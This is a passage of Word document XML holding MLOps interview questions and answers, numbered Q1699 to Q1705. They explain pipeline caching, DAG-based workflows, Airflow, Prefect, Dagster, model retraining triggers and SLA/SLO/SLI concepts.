        <w:t xml:space="preserve">      * Data ingestion layer</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * ETL/data preprocessing</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Feature engineering pipeline</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Model inference engine</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Storage and reporting systems</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Monitoring and logging</w:t>
        <w:br/>
        <w:t>Benefits</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Efficient for large-scale processing</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Lower infrastructure cost compared to real-time serving</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Easier resource management</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Simplified orchestration and monitoring</w:t>
        <w:br/>
        <w:t>Challenges</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Prediction latency</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Stale predictions between runs</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Dependency on data pipeline schedules</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Large compute resource requirements during execution windows</w:t>
        <w:br/>
        <w:t>Popular Tools and Technologies</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Apache Spark</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Airflow</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Kubeflow</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * MLflow</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Databricks</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * TensorFlow</w:t>
        <w:br/>
        <w:t>From an MLOps perspective, batch scoring pipelines are important for scalable offline inference, scheduled prediction workflows, and enterprise analytics systems handling large datasets efficiently.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1699. What is pipeline caching?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Pipeline caching is a technique used in ML and data pipelines where previously completed pipeline steps and their outputs are stored and reused instead of executing the same steps again.</w:t>
        <w:br/>
        <w:t>The main goal of pipeline caching is to reduce execution time, save compute resources, and improve pipeline efficiency.</w:t>
        <w:br/>
        <w:t>If a pipeline step receives the same input data, code, and configuration as before, the cached output can be reused directly without rerunning that step.</w:t>
        <w:br/>
        <w:t>Example</w:t>
        <w:br/>
        <w:t>In an ML pipeline:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Data preprocessing step already completed earlier</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * No changes in input data or transformation logic</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Pipeline reuses cached preprocessing output instead of running it again</w:t>
        <w:br/>
        <w:t>Benefits of Pipeline Caching</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Faster pipeline execution</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Reduced compute and infrastructure cost</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Improved experimentation speed</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Efficient resource utilization</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Faster retraining and CI/CD workflows</w:t>
        <w:br/>
        <w:t>Common Pipeline Stages That Use Caching</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Data preprocessing</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Feature engineering</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Dataset validation</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Model training outputs</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Intermediate artifacts</w:t>
        <w:br/>
        <w:t>How Pipeline Caching Works</w:t>
        <w:br/>
        <w:t xml:space="preserve">      1. Pipeline step execution metadata is stored</w:t>
        <w:br/>
        <w:t xml:space="preserve">      2. Inputs, parameters, and dependencies are tracked</w:t>
        <w:br/>
        <w:t xml:space="preserve">      3. System checks whether the same step was executed before</w:t>
        <w:br/>
        <w:t xml:space="preserve">      4. Cached artifacts are reused if no changes are detected</w:t>
        <w:br/>
        <w:t>Challenges</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Cache invalidation management</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Storage overhead</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Dependency tracking complexity</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Risk of using stale artifacts</w:t>
        <w:br/>
        <w:t>Popular Tools Supporting Pipeline Caching</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Kubeflow Pipelines</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * TensorFlow Extended</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Dagster</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Apache Airflow</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * DVC</w:t>
        <w:br/>
        <w:t>From an MLOps perspective, pipeline caching is important for improving scalability, accelerating experimentation, optimizing cloud costs, and enabling efficient ML workflow automation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1700. Explain DAG-based workflows.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: DAG-based workflows are workflow management systems where tasks are organized as a Directed Acyclic Graph (DAG).</w:t>
        <w:br/>
        <w:t>In a DAG:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Directed means tasks have a defined execution order.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Acyclic means there are no loops or circular dependencies.</w:t>
        <w:br/>
        <w:t>Each node represents a task, and edges represent dependencies between tasks. A task can only start after its dependent tasks are completed successfully.</w:t>
        <w:br/>
        <w:t>Example in ML Pipelines</w:t>
        <w:br/>
        <w:t>A typical DAG workflow may look like:</w:t>
        <w:br/>
        <w:t>Data Ingestion → Data Validation → Feature Engineering → Model Training → Evaluation → Deployment</w:t>
        <w:br/>
        <w:t>Each step depends on the previous step.</w:t>
        <w:br/>
        <w:t>Why DAG-based Workflows are Used</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Manage complex ML and data pipelines</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Automate task orchestration</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Handle dependencies efficiently</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Improve scalability and monitoring</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Enable reproducible workflows</w:t>
        <w:br/>
        <w:t>Key Features</w:t>
        <w:br/>
        <w:t xml:space="preserve">      1. Task dependency management</w:t>
        <w:br/>
        <w:t xml:space="preserve">      2. Parallel execution support</w:t>
        <w:br/>
        <w:t xml:space="preserve">      3. Scheduling and automation</w:t>
        <w:br/>
        <w:t xml:space="preserve">      4. Retry and failure handling</w:t>
        <w:br/>
        <w:t xml:space="preserve">      5. Monitoring and logging</w:t>
        <w:br/>
        <w:t xml:space="preserve">      6. Workflow visualization</w:t>
        <w:br/>
        <w:t>Common Use Cases</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * ETL pipelines</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * ML training pipelines</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Batch scoring workflows</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * CI/CD automation</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Data processing systems</w:t>
        <w:br/>
        <w:t>Benefits</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Better pipeline organization</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Easier debugging and monitoring</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Efficient execution management</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Improved scalability and reliability</w:t>
        <w:br/>
        <w:t>Challenges</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Complex dependency management in large pipelines</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Scheduling optimization</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Handling dynamic workflows</w:t>
        <w:br/>
        <w:t>Popular DAG Workflow Tools</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Apache Airflow</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Kubeflow Pipelines</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Dagster</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Luigi</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Prefect</w:t>
        <w:br/>
        <w:t>From an MLOps perspective, DAG-based workflows are essential for orchestrating scalable, automated, and production-ready machine learning and data engineering pipelines.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1701. What is Airflow?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Apache Airflow is an open-source workflow orchestration platform used to automate, schedule, and manage complex data engineering and machine learning pipelines.</w:t>
        <w:br/>
        <w:t>It is widely used in Data Engineering, DevOps, and MLOps for building DAG-based workflows.</w:t>
        <w:br/>
        <w:t>In Airflow, workflows are defined as DAGs (Directed Acyclic Graphs) where:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Each node represents a task</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Dependencies define execution order</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Tasks run automatically based on schedules or triggers</w:t>
        <w:br/>
        <w:t>Key Features of Airflow</w:t>
        <w:br/>
        <w:t xml:space="preserve">      1. Workflow Scheduling</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Run pipelines hourly, daily, weekly, or event-based.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      2. DAG-based Orchestration</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Manages task dependencies efficiently.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      3. Scalability</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Supports distributed execution across multiple workers.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      4. Monitoring and Logging</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Provides UI for tracking pipeline execution and failures.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      5. Retry and Failure Handling</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Automatically retries failed tasks.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      6. Extensible Architecture</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Integrates with cloud, databases, Kubernetes, Spark, and ML tools.</w:t>
        <w:br/>
        <w:t>Common Airflow Components</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Scheduler</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Web Server</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Metadata Database</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Executor</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Workers</w:t>
        <w:br/>
        <w:t>Typical MLOps Use Cases</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * ETL pipelines</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Feature engineering workflows</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Model training orchestration</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Batch scoring pipelines</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * CI/CD automation</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Data validation pipelines</w:t>
        <w:br/>
        <w:t>Popular Integrations</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Apache Spark</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Kubernetes</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Docker</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * TensorFlow</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * MLflow</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Amazon Web Services</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Google Cloud</w:t>
        <w:br/>
        <w:t>Example Workflow</w:t>
        <w:br/>
        <w:t>Data Ingestion → Validation → Feature Engineering → Model Training → Evaluation → Deployment</w:t>
        <w:br/>
        <w:t>From an interview perspective, Airflow is commonly used to orchestrate and automate end-to-end ML and data pipelines in production environments.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1702. Explain Prefect.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Prefect is a modern open-source workflow orchestration platform used to automate, schedule, and monitor data engineering and machine learning pipelines.</w:t>
        <w:br/>
        <w:t>It is designed to simplify pipeline orchestration with a more developer-friendly and flexible approach compared to traditional workflow tools.</w:t>
        <w:br/>
        <w:t>In Prefect, workflows are called Flows, and individual execution units are called Tasks.</w:t>
        <w:br/>
        <w:t>Key Features of Prefect</w:t>
        <w:br/>
        <w:t xml:space="preserve">      1. Workflow Orchestration</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Automates complex data and ML pipelines.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      2. Dynamic Workflows</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Supports dynamic task generation and conditional execution.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      3. Retry and Failure Handling</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Automatic retries and error recovery mechanisms.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      4. Monitoring and Observability</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Provides dashboards, logs, and execution tracking.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      5. Cloud and Hybrid Deployment</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Works on local systems, Kubernetes, and cloud platforms.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      6. Python-native Design</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Pipelines are written directly in Python without complex configuration.</w:t>
        <w:br/>
        <w:t>Common Use Cases</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * ETL workflows</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * ML training pipelines</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Batch inference pipelines</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Data validation workflows</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Scheduled automation jobs</w:t>
        <w:br/>
        <w:t>Architecture Components</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Flow</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Task</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Agent</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Scheduler</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * API/Backend</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Workers</w:t>
        <w:br/>
        <w:t>Benefits of Prefect</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Easier pipeline development</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Better debugging experience</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Flexible workflow execution</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Improved scalability</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Strong observability features</w:t>
        <w:br/>
        <w:t>Popular Integrations</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Docker</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Kubernetes</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Dask</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Ray</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * MLflow</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Amazon Web Services</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Google Cloud</w:t>
        <w:br/>
        <w:t>Difference Between Airflow and Prefect</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Apache Airflow is more scheduler-centric and DAG-focused.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Prefect is more dynamic, Python-native, and developer-friendly.</w:t>
        <w:br/>
        <w:t>From an MLOps perspective, Prefect is widely used for orchestrating scalable, reliable, and maintainable ML and data workflows with modern automation capabilities.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1703. What is Dagster?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Dagster is an open-source data orchestration platform used to build, schedule, monitor, and manage data engineering and machine learning workflows.</w:t>
        <w:br/>
        <w:t>It is designed with a strong focus on data-aware orchestration, observability, and software engineering best practices.</w:t>
        <w:br/>
        <w:t>Unlike traditional workflow tools that mainly focus on task scheduling, Dagster emphasizes managing data assets, dependencies, and pipeline reliability.</w:t>
        <w:br/>
        <w:t>Key Concepts in Dagster</w:t>
        <w:br/>
        <w:t xml:space="preserve">      1. Ops</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Individual computation or processing tasks.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      2. Jobs</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Collections of ops organized into workflows.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      3. Assets</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Data objects such as tables, datasets, or ML features managed by the pipeline.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      4. Schedules and Sensors</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Automate workflow execution based on time or events.</w:t>
        <w:br/>
        <w:t>Key Features</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Data-aware orchestration</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Strong observability and lineage tracking</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Type checking and validation</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Modular pipeline design</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Retry and failure handling</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Local and cloud deployment support</w:t>
        <w:br/>
        <w:t>Common Use Cases</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * ETL pipelines</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Feature engineering</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * ML training workflows</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Batch scoring pipelines</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Data quality monitoring</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Analytics orchestration</w:t>
        <w:br/>
        <w:t>Benefits</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Better debugging and observability</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Improved pipeline reliability</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Easier dependency management</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Asset lineage tracking</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Strong developer experience</w:t>
        <w:br/>
        <w:t>Popular Integrations</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Kubernetes</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Docker</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Apache Spark</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * dbt</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Snowflake</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * MLflow</w:t>
        <w:br/>
        <w:t>Difference from Airflow</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Apache Airflow focuses mainly on task orchestration using DAGs.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Dagster focuses more on data assets, lineage, and observability.</w:t>
        <w:br/>
        <w:t>From an MLOps perspective, Dagster is useful for building scalable, observable, and maintainable ML and data pipelines with strong data dependency management.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1704. Explain model retraining triggers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Model retraining triggers are conditions or events that automatically initiate the retraining of a machine learning model to maintain its accuracy and performance in production environments.</w:t>
        <w:br/>
        <w:t>These triggers help ensure the model stays updated when data patterns, user behavior, or business conditions change over time.</w:t>
        <w:br/>
        <w:t>Common Model Retraining Triggers</w:t>
        <w:br/>
        <w:t xml:space="preserve">      1. Data Drift Detection</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Triggered when production input data distribution changes significantly from training data.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      2. Concept Drift Detection</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Triggered when relationships between features and target outputs change.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      3. Performance Degradation</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Retraining starts when accuracy, precision, recall, or business KPIs fall below thresholds.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      4. Scheduled Retraining</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Models are retrained at fixed intervals such as daily, weekly, or monthly.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      5. New Data Availability</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Triggered when a sufficient amount of fresh labeled data becomes available.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      6. Feature Changes</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Retraining occurs after modifications in feature engineering or data schema.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      7. Business Rule Changes</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Triggered by new policies, regulations, or changing business requirements.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      8. Infrastructure or Dependency Updates</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Retraining may occur after framework, library, or environment updates.</w:t>
        <w:br/>
        <w:t>Example</w:t>
        <w:br/>
        <w:t>In a fraud detection system:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * If fraud patterns evolve and model accuracy drops, monitoring systems automatically trigger retraining pipelines.</w:t>
        <w:br/>
        <w:t>Components Involved</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Monitoring systems</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Drift detection tools</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Pipeline orchestration platforms</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * CI/CD automation</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Feature stores</w:t>
        <w:br/>
        <w:t>Popular Tools</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * MLflow</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Kubeflow</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Apache Airflow</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Evidently AI</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Prometheus</w:t>
        <w:br/>
        <w:t>From an MLOps perspective, retraining triggers are essential for enabling automated, adaptive, and continuously improving ML systems in production.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1705. What are SLA/SLO/SLI in ML systems?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: In ML systems, SLA, SLO, and SLI are reliability and performance management concepts used to measure and maintain the quality of machine learning services in production.</w:t>
        <w:br/>
        <w:t>They help define expectations for availability, latency, accuracy, and operational performance of ML systems.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>1. SLI (Service Level Indicator)</w:t>
        <w:br/>
        <w:t>An SLI is a measurable metric used to evaluate the performance or reliability of an ML service.</w:t>
        <w:br/>
        <w:t>Common ML SLIs</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Inference latency</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Prediction accuracy</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * API success rate</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Throughput</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Model uptime</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Data freshness</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Error rate</w:t>
        <w:br/>
        <w:t>Example</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * “95% of predictions should respond within 100 ms.”</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. SLO (Service Level Objective)</w:t>
        <w:br/>
        <w:t>An SLO is the target or desired value for an SLI.</w:t>
        <w:br/>
        <w:t>It defines the expected operational performance that the ML system should achieve.</w:t>
        <w:br/>
        <w:t>Example</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * “Maintain 99.9% model serving availability.”</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * “Inference latency should remain below 200 ms for 99% of requests.”</w:t>
        <w:br/>
        <w:t>SLOs help teams monitor reliability and trigger alerts when objectives are not met.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. SLA (Service Level Agreement)</w:t>
        <w:br/>
        <w:t>An SLA is a formal agreement between service providers and customers that defines guaranteed service levels and consequences if targets are not achieved.</w:t>
        <w:br/>
        <w:t>SLAs are business or contractual commitments based on SLOs.</w:t>
        <w:br/>
        <w:t>Example</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * “The ML prediction API will maintain 99.95% uptime per month.”</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * “Failure to meet the SLA may result in service credits.”</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Relationship Between SLI, SLO, and SLA</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * SLI → What is measured</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * SLO → Target for the measurement</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * SLA → Formal commitment based on the target</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Examples in ML Systems</w:t>
        <w:br/>
        <w:t>Metric Type</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Example</w:t>
        <w:br/>
        <w:tab/>
        <w:t>SLI</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Model latency = 120 ms</w:t>
        <w:br/>
        <w:tab/>
        <w:t>SLO</w:t>
        <w:br/>
        <w:tab/>
        <w:t>99% requests under 150 ms</w:t>
        <w:br/>
        <w:tab/>
        <w:t>SLA</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Guaranteed 99.9% API uptime</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Common Areas Monitored in ML Systems</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Model inference latency</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Prediction accuracy</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Drift detection</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Feature freshness</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Pipeline reliability</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * GPU/CPU utilization</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Availability and uptime</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Popular Monitoring Tools</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Prometheus</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Grafana</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Datadog</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * New Relic</w:t>
        <w:br/>
